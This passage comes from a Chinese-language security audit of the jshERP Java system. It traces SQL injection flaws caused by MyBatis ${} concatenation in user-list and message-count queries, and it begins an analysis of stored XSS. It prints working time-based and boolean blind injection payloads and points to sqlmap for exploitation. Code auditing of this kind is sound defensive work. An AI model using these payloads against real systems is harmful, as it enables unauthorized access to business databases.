<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>OFFSET</span><span class=o>,</span> <span class=n>offset</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>list</span> <span class=o>=</span> <span class=n>configResourceManager</span><span class=o>.</span><span class=na>select</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>);</span>
<span class=n>objectMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"page"</span><span class=o>,</span> <span class=n>queryInfo</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>list</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;</span><span class=n>Object</span><span class=o>&gt;());</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>DEFAULT_LIST_NULL_NUMBER</span><span class=o>);</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=s>"查找不到数据"</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=n>list</span><span class=o>);</span>
<span class=c1>// 这里</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>configResourceManager</span><span class=o>.</span><span class=na>counts</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>));</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>这里包含一个路径变量apiName以apiName为名找对应的处理包对应的包中存在Component类根据上面分析从UserComponent中来的对应的是user包因此apiName为user</p>
<p>另外根据UserComponent类中的counts方法在map中寻找userName和loginName因此search参数包含userName和loginName</p>
<p>正向数据链:/user/list——&gt;ResourceController.getList——&gt;CommonQueryManager.counts——&gt;UserComponent.counts——&gt;UserService.countUser——&gt;UserMapperEx.countsByUser——&gt;UserMapperEx.xml中id为countsByUser的查询</p>
<p>同样的道理在这个getList方法中还有一个select查询对应的数据链</p>
<p>/user/list——&gt;ResourceController.getList——&gt;CommonQueryManager.select——&gt;UserComponent.select——&gt;UserComponent.getUserList——&gt;UserService.select——&gt;UserMapperEx.selectByConditionUser——&gt;UserMapperEx.xml中id为selectByConditionUser的查询</p>
<div class=highlight><pre><span></span><span class=nt>&lt;select</span> <span class=na>id=</span><span class=s>"selectByConditionUser"</span> <span class=na>parameterType=</span><span class=s>"com.jsh.erp.datasource.entities.UserExample"</span> <span class=na>resultMap=</span><span class=s>"ResultMapEx"</span><span class=nt>&gt;</span>
select user.id, user.username, user.login_name, user.position, user.email, user.phonenum,
user.description, user.remark,user.isystem,org.id as orgaId,user.tenant_id,org.org_abr,
rel.user_blng_orga_dspl_seq,rel.id as orgaUserRelId,
(select r.name from jsh_user_business ub
inner join jsh_role r on ub.value=concat("[",r.id,"]") and ifnull(r.delete_flag,'0') !='1'
where ub.type='UserRole' and ub.key_id=user.id limit 0,1) roleName
FROM jsh_user user
left join jsh_orga_user_rel rel on user.id=rel.user_id and ifnull(rel.delete_flag,'0') !='1'
left join jsh_organization org on rel.orga_id=org.id and ifnull(org.org_stcd,'0') !='5'
where 1=1
and ifnull(user.status,'0') not in('1','2')
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"userName != null"</span><span class=nt>&gt;</span>
and user.username like '%${userName}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"loginName != null"</span><span class=nt>&gt;</span>
and user.login_name like '%${loginName}%'
<span class=nt>&lt;/if&gt;</span>
order by rel.user_blng_orga_dspl_seq,user.id desc
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"offset != null and rows != null"</span><span class=nt>&gt;</span>
limit #{offset},#{rows}
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/select&gt;</span>
</pre></div>
<h4>测试</h4>
<p>触发界面</p>
<p><a id=img6 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233046-debeea6e-c116-1.png><img src="
<p>抓包</p>
<p><a id=img7 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233059-e6756198-c116-1.png><img src="
<p>这里的search参数包含了userName和loginName参数后端的SQL语句如下</p>
<p>IDcom.jsh.erp.datasource.mappers.UserMapperEx.countsByUser</p>
<div class=highlight><pre><span></span><span class=k>SELECT</span> <span class=k>count</span><span class=p>(</span><span class=k>user</span><span class=p>.</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_user</span> <span class=k>user</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_user_business</span> <span class=n>ub</span> <span class=k>ON</span> <span class=k>user</span><span class=p>.</span><span class=n>id</span> <span class=o>=</span> <span class=n>ub</span><span class=p>.</span><span class=n>key_id</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_orga_user_rel</span> <span class=n>rel</span> <span class=k>ON</span> <span class=n>rel</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=k>user</span><span class=p>.</span><span class=n>id</span> <span class=o>=</span> <span class=n>rel</span><span class=p>.</span><span class=n>user_id</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>rel</span><span class=p>.</span><span class=n>delete_flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_organization</span> <span class=n>org</span> <span class=k>ON</span> <span class=n>org</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>rel</span><span class=p>.</span><span class=n>orga_id</span> <span class=o>=</span> <span class=n>org</span><span class=p>.</span><span class=n>id</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>org</span><span class=p>.</span><span class=n>org_stcd</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'5'</span> <span class=k>WHERE</span> <span class=k>user</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=k>user</span><span class=p>.</span><span class=n>status</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=k>NOT</span> <span class=k>IN</span> <span class=p>(</span><span class=s1>'1'</span><span class=p>,</span> <span class=s1>'2'</span><span class=p>)</span> <span class=k>AND</span> <span class=k>user</span><span class=p>.</span><span class=n>login_name</span> <span class=k>LIKE</span> <span class=s1>'%jsh%'</span>
</pre></div>
<p>按照该SQL语句在login_name构造布尔盲注的payload<code>%'/**/And/**/SleeP(3)--</code></p>
<p><a id=img8 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233113-ee9c6600-c116-1.png><img src="
<p>根据响应时间成功得到此处存在SQL注入</p>
<p>对应的SQL语句</p>
<div class=highlight><pre><span></span><span class=k>SELECT</span> <span class=k>count</span><span class=p>(</span><span class=k>user</span><span class=p>.</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_user</span> <span class=k>user</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_user_business</span> <span class=n>ub</span> <span class=k>ON</span> <span class=k>user</span><span class=p>.</span><span class=n>id</span> <span class=o>=</span> <span class=n>ub</span><span class=p>.</span><span class=n>key_id</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_orga_user_rel</span> <span class=n>rel</span> <span class=k>ON</span> <span class=n>rel</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=k>user</span><span class=p>.</span><span class=n>id</span> <span class=o>=</span> <span class=n>rel</span><span class=p>.</span><span class=n>user_id</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>rel</span><span class=p>.</span><span class=n>delete_flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>LEFT</span> <span class=k>JOIN</span> <span class=n>jsh_organization</span> <span class=n>org</span> <span class=k>ON</span> <span class=n>org</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=n>rel</span><span class=p>.</span><span class=n>orga_id</span> <span class=o>=</span> <span class=n>org</span><span class=p>.</span><span class=n>id</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>org</span><span class=p>.</span><span class=n>org_stcd</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'5'</span> <span class=k>WHERE</span> <span class=k>user</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=k>user</span><span class=p>.</span><span class=n>status</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=k>NOT</span> <span class=k>IN</span> <span class=p>(</span><span class=s1>'1'</span><span class=p>,</span> <span class=s1>'2'</span><span class=p>)</span> <span class=k>AND</span> <span class=k>user</span><span class=p>.</span><span class=n>username</span> <span class=k>LIKE</span> <span class=s1>'%%'</span> <span class=k>AND</span> <span class=n>SleeP</span><span class=p>(</span><span class=mi>3</span><span class=p>)</span>
</pre></div>
<p>接下来使用sqlmap跑就ok了同样在userName参数也是一样的问题</p>
<h3 id=toc-9>注入点2</h3>
<h4>分析</h4>
<p>关注一个没有like匹配的</p>
<p><a id=img9 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233128-f7b3d6d8-c116-1.png><img src="
<p>关注红框这个找到MsgMapperEx.xml文件SQL查询如下</p>
<div class=highlight><pre><span></span><span class=nt>&lt;select</span> <span class=na>id=</span><span class=s>"getMsgCountByStatus"</span> <span class=na>resultType=</span><span class=s>"java.lang.Long"</span><span class=nt>&gt;</span>
SELECT
COUNT(id)
FROM jsh_msg
WHERE 1=1
and ifnull(delete_Flag,'0') !='1'
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"status != null"</span><span class=nt>&gt;</span>
and status = '${status}'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/select&gt;</span>
</pre></div>
<p>这里的status参数直接经过拼接因此可能存在SQL注入找对应的MapperMsgMapperEx.java的文件中</p>
<div class=highlight><pre><span></span><span class=n>Long</span> <span class=nf>getMsgCountByStatus</span><span class=o>(</span>
<span class=nd>@Param</span><span class=o>(</span><span class=s>"status"</span><span class=o>)</span> <span class=n>String</span> <span class=n>status</span><span class=o>,</span>
<span class=nd>@Param</span><span class=o>(</span><span class=s>"userId"</span><span class=o>)</span> <span class=n>Long</span> <span class=n>userId</span><span class=o>);</span>
</pre></div>
<p>Ctrl+B找被调用处应该到Service层即MsgService.java文件中</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=n>Long</span> <span class=nf>getMsgCountByStatus</span><span class=o>(</span><span class=n>String</span> <span class=n>status</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Long</span> <span class=n>result</span><span class=o>=</span><span class=kc>null</span><span class=o>;</span>
<span class=k>try</span><span class=o>{</span>
<span class=n>User</span> <span class=n>userInfo</span><span class=o>=</span><span class=n>userService</span><span class=o>.</span><span class=na>getCurrentUser</span><span class=o>();</span>
<span class=c1>// 这里</span>
<span class=n>result</span><span class=o>=</span><span class=n>msgMapperEx</span><span class=o>.</span><span class=na>getMsgCountByStatus</span><span class=o>(</span><span class=n>status</span><span class=o>,</span> <span class=n>userInfo</span><span class=o>.</span><span class=na>getId</span><span class=o>());</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>logger</span><span class=o>.</span><span class=na>error</span><span class=o>(</span><span class=s>"异常码[{}],异常提示[{}],异常[{}]"</span><span class=o>,</span>
<span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>DATA_READ_FAIL_CODE</span><span class=o>,</span> <span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>DATA_READ_FAIL_MSG</span><span class=o>,</span><span class=n>e</span><span class=o>);</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>BusinessRunTimeException</span><span class=o>(</span><span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>DATA_READ_FAIL_CODE</span><span class=o>,</span>
<span class=n>ExceptionConstants</span><span class=o>.</span><span class=na>DATA_READ_FAIL_MSG</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>继续往上到Controller层来到MsgController.java</p>
<div class=highlight><pre><span></span><span class=nd>@GetMapping</span><span class=o>(</span><span class=s>"/getMsgCountByStatus"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>BaseResponseInfo</span> <span class=nf>getMsgCountByStatus</span><span class=o>(</span><span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"status"</span><span class=o>)</span> <span class=n>String</span> <span class=n>status</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>BaseResponseInfo</span> <span class=n>res</span> <span class=o>=</span> <span class=k>new</span> <span class=n>BaseResponseInfo</span><span class=o>();</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Long</span><span class=o>&gt;</span> <span class=n>map</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Long</span><span class=o>&gt;();</span>
<span class=c1>// 这里</span>
<span class=n>Long</span> <span class=n>count</span> <span class=o>=</span> <span class=n>msgService</span><span class=o>.</span><span class=na>getMsgCountByStatus</span><span class=o>(</span><span class=n>status</span><span class=o>);</span>
<span class=n>map</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"count"</span><span class=o>,</span> <span class=n>count</span><span class=o>);</span>
<span class=n>res</span><span class=o>.</span><span class=na>code</span> <span class=o>=</span> <span class=mi>200</span><span class=o>;</span>
<span class=n>res</span><span class=o>.</span><span class=na>data</span> <span class=o>=</span> <span class=n>map</span><span class=o>;</span>
<span class=o>}</span> <span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>e</span><span class=o>.</span><span class=na>printStackTrace</span><span class=o>();</span>
<span class=n>res</span><span class=o>.</span><span class=na>code</span> <span class=o>=</span> <span class=mi>500</span><span class=o>;</span>
<span class=n>res</span><span class=o>.</span><span class=na>data</span> <span class=o>=</span> <span class=s>"获取数据失败"</span><span class=o>;</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>res</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>首先传入的status在本方法中没有进行任何过滤同时根据前面分析filter中也没有进行过滤另外这里存在3种返回状态</p>
<ul>
<li>查询语句报错返回500即获取数据失败</li>
<li>根据SQL语句分析查询得到的count为0即拼接的条件为false</li>
<li>查询结果count不为0即where的条件为true默认没有拼接条件</li>
</ul>
<p>根据分析,这里可以利用布尔盲注,前提需要在消息列表至少插入一条数据,当然时间注入也可以</p>
<p>正向数据链:/msg/getMsgCountByStatus——&gt;MsgController.getMsgCountByStatus——&gt;MsgService.getMsgCountByStatus——&gt;MsgMapperEx.getMsgCountByStatus——&gt;MsgMapperEx.xml中id为getMsgCountByStatus</p>
<h4>测试</h4>
<p>触发界面:</p>
<p><a id=img10 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233149-045bf992-c117-1.png><img src=
<p>抓包:</p>
<p><a id=img11 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233201-0b81979a-c117-1.png><img src="
<p>后台查询语句:</p>
<div class=highlight><pre><span></span><span class=k>SELECT</span> <span class=k>COUNT</span><span class=p>(</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_msg</span> <span class=k>WHERE</span> <span class=n>jsh_msg</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>delete_Flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=n>status</span> <span class=o>=</span> <span class=s1>'1'</span>
</pre></div>
<p>拼接payload<code>1'/**/and/**/1=1--</code><code>1'/**/and/**/1=2--</code></p>
<p><a id=img12 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233214-1322dffe-c117-1.png><img src="
<p><a id=img13 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233228-1bc86566-c117-1.png><img src=
<p>后台SQL语句</p>
<div class=highlight><pre><span></span><span class=k>SELECT</span> <span class=k>COUNT</span><span class=p>(</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_msg</span> <span class=k>WHERE</span> <span class=n>jsh_msg</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>delete_Flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=n>status</span> <span class=o>=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span>
<span class=k>SELECT</span> <span class=k>COUNT</span><span class=p>(</span><span class=n>id</span><span class=p>)</span> <span class=k>FROM</span> <span class=n>jsh_msg</span> <span class=k>WHERE</span> <span class=n>jsh_msg</span><span class=p>.</span><span class=n>tenant_id</span> <span class=o>=</span> <span class=mi>63</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>1</span> <span class=k>AND</span> <span class=n>ifnull</span><span class=p>(</span><span class=n>delete_Flag</span><span class=p>,</span> <span class=s1>'0'</span><span class=p>)</span> <span class=o>!=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=n>status</span> <span class=o>=</span> <span class=s1>'1'</span> <span class=k>AND</span> <span class=mi>1</span> <span class=o>=</span> <span class=mi>2</span>
</pre></div>
<p>根据后面的条件是否成立返回的结果不一致故存在布尔盲注后面只需要使用sqlmap跑一遍即可</p>
<h3 id=toc-10>其他注入点</h3>
<p>还存在很多注入点,上面只描述了时间盲注和布尔盲注两种类型,同时体现了<code>like ${}</code><code>${}</code>,正常<code>${}</code>比较少,一般会使用<code>#{}</code>重点like、order by、in等关键字</p>
<p><a id=img14 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233243-2490012c-c117-1.png><img src="
<p><a id=img15 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233255-2b8e1b30-c117-1.png><img src="
<p><a id=img16 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233308-33745a4e-c117-1.png><img src="
<p><a id=img17 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233321-3b460e7a-c117-1.png><img src=
<p>还有很多不一一列举可以使用Yakit进行扫描</p>
<h2 id=toc-11>XSS漏洞</h2>
<h3 id=toc-12>审计关键点</h3>
<p>关键字:</p>
<div class=highlight><pre><span></span>&lt;%<span class=o>=</span>
<span class=si>${</span><span class=p></span>
<span class=p>&lt;c:</span><span class=nv>out</span><span class=p></span>
<span class=p>&lt;c:</span><span class=nv>if</span><span class=p></span>
<span class=p>&lt;c:</span><span class=nv>forEach</span><span class=p></span>
<span class=p>ModelAndView</span>
<span class=p>ModelMap</span>
<span class=p>Model</span>
<span class=p>request.getParameter</span>
<span class=p>request.setAttribute</span>
</pre></div>
<p>在jsp文件中使用<code>&lt;c:out&gt;</code>标签是直接对代码进行输出而不当成js代码执行</p>
<p>在使用thymeleaf 模板进行渲染时,模板自带有字符转义的功能</p>
<ul>
<li>th:text 进行文本替换 不会解析html</li>
<li>th:utext 进行文本替换 会解析html</li>
</ul>
<p>以下例子中没有使用渲染模板,最好从前端界面入手,寻找可能的插入点,然后对后端代码进行分析</p>
<h3 id=toc-13>漏洞点1</h3>
<h4>分析</h4>
<p>存储型XSS一般分为两个部分</p>
<ul>
<li>将攻击向量通过某个接口存入</li>
<li>将数据库中的攻击向量通过某个接口显示在页面中</li>
</ul>
<p><strong>存入点分析</strong></p>
<p>根据/supplier/update找到对应的Controller在ResourceController.java中</p>
<div class=highlight><pre><span></span><span class=nd>@PostMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/{apiName}/update"</span><span class=o>,</span> <span class=n>produces</span> <span class=o>=</span> <span class=o>{</span><span class=s>"application/javascript"</span><span class=o>,</span> <span class=s>"application/json"</span><span class=o>})</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>updateResource</span><span class=o>(</span><span class=nd>@PathVariable</span><span class=o>(</span><span class=s>"apiName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>apiName</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"info"</span><span class=o>)</span> <span class=n>String</span> <span class=n>beanJson</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=s>"id"</span><span class=o>)</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span> <span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=c1>// 这里</span>
<span class=kt>int</span> <span class=n>update</span> <span class=o>=</span> <span class=n>configResourceManager</span><span class=o>.</span><span class=na>update</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>beanJson</span><span class=o>,</span> <span class=n>id</span><span class=o>,</span> <span class=n>request</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>update</span> <span class=o>&gt;</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=k>if</span><span class=o>(</span><span class=n>update</span> <span class=o>==</span> <span class=o>-</span><span class=mi>1</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>TEST_USER</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>TEST_USER</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>ERROR</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>ERROR</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>找到对应的处理方法</p>
<div class=highlight><pre><span></span><span class=nd>@Transactional</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"transactionManager"</span><span class=o>,</span> <span class=n>rollbackFor</span> <span class=o>=</span> <span class=n>Exception</span><span class=o>.</span><span class=na>class</span><span class=o>)</span>
<span class=kd>public</span> <span class=kt>int</span> <span class=nf>update</span><span class=o>(</span><span class=n>String</span> <span class=n>apiName</span><span class=o>,</span> <span class=n>String</span> <span class=n>beanJson</span><span class=o>,</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span> <span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>apiName</span><span class=o>))</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>container</span><span class=o>.</span><span class=na>getCommonQuery</span><span class=o>(</span><span class=n>apiName</span><span class=o>).</span><span class=na>update</span><span class=o>(</span><span class=n>beanJson</span><span class=o>,</span> <span class=n>id</span><span class=o>,</span> <span class=n>request</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=mi>0</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>还是一样找到SupplierComponent.java类中的update方法</p>
<div class=highlight><pre><span></span><span class=nd>@Override</span>
<span class=kd>public</span> <span class=kt>int</span> <span class=nf>update</span><span class=o>(</span><span class=n>String</span> <span class=n>beanJson</span><span class=o>,</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span> <span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>supplierService</span><span class=o>.</span><span class=na>updateSupplier</span><span class=o>(</span><span class=n>beanJson</span><span class=o>,</span> <span class=n>id</span><span class=o>,</span> <span class=n>request</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>来到SupplierService.java层</p>
<div class=highlight><pre><span></span><span class=nd>@Transactional</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"transactionManager"</span><span class=o>,</span> <span class=n>rollbackFor</span> <span class=o>=</span> <span class=n>Exception</span><span class=o>.</span><span class=na>class</span><span class=o>)</span>
<span class=kd>public</span> <span class=kt>int</span> <span class=nf>updateSupplier</span><span class=o>(</span><span class=n>String</span> <span class=n>beanJson</span><span class=o>,</span> <span class=n>Long</span> <span class=n>id</span><span class=o>,</span> <span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Supplier</span> <span class=n>supplier</span> <span class=o>=</span> <span class=n>JSONObject</span><span class=o>.</span><span class=na>parseObject</span><span class=o>(</span><span class=n>beanJson</span><span class=o>,</span> <span class=n>Supplier</span><span class=o>.</span><span class=na>class</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>supplier</span><span class=o>.</span><span class=na>getBeginNeedPay</span><span class=o>()</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>supplier</span><span class=o>.</span><span class=na>setBeginNeedPay</span><span class=o>(</span><span class=n>BigDecimal</span><span class=o>.</span><span class=na>ZERO</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>if</span><span class=o>(</span><span class=n>supplier</span><span class=o>.</span><span class=na>getBeginNeedGet</span><span class=o>()</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>supplier</span><span class=o>.</span><span class=na>setBeginNeedGet</span><span class=o>(</span><span class=n>BigDecimal</span><span class=o>.</span><span class=na>ZERO</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>supplier</span><span class=o>.</span><span class=na>setId</span><span class=o>(</span><span class=n>id</span><span class=o>);</span>
<span class=kt>int</span> <span class=n>result</span><span class=o>=</span><span class=mi>0</span><span class=o>;</span>
<span class=k>try</span><span class=o>{</span>
<span class=c1>// 这里</span>
<span class=n>result</span><span class=o>=</span><span class=n>supplierMapper</span><span class=o>.</span><span class=na>updateByPrimaryKeySelective</span><span class=o>(</span><span class=n>supplier</span><span class=o>);</span>
<span class=n>logService</span><span class=o>.</span><span class=na>insertLog</span><span class=o>(</span><span class=s>"商家"</span><span class=o>,</span>
